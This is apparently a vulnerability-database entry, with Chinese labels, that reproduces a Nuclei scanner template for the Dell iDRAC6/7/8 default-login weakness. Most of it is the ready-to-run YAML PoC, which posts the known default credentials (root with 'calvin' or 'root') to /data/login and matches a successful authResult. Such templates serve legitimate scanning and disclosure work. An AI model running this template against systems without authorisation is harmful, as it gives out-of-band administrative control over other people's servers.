dell-idrac-default-login: Dell iDRAC6/7/8 Default Login

日期: 2025-08-01 | 影响软件: dell-idrac-default-login | POC: 已公开

漏洞描述

Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.

PoC代码[已公开]

id: dell-idrac-default-login

info:
  name: Dell iDRAC6/7/8 Default Login
  author: kophjager007,megamansec
  severity: high
  description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
  reference:
    - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 2
  tags: dell,idrac,default-login,vuln

http:
  - raw:
      - |
        POST /data/login HTTP/1.1
        Host: {{Hostname}}

        user={{username}}&password={{password}}

    payloads:
      username:
        - root
      password:
        - calvin
        - root
    attack: clusterbomb

    headers:
      Content-Type: "application/x-www-form-urlencode"
      Referer: "{{BaseURL}}/login.html"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<authResult>0</authResult>'
# digest: 4a0a00473045022100a55ec15d71d8171ebd6f721cfff13c44599f4205c7dcfad67c458e6278e3f14102202af405ea894e2f2e54fd108bbed019ffa1c9d40a185b4b56998d7eaa2d597bb0:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/dell/dell-idrac-default-login.yaml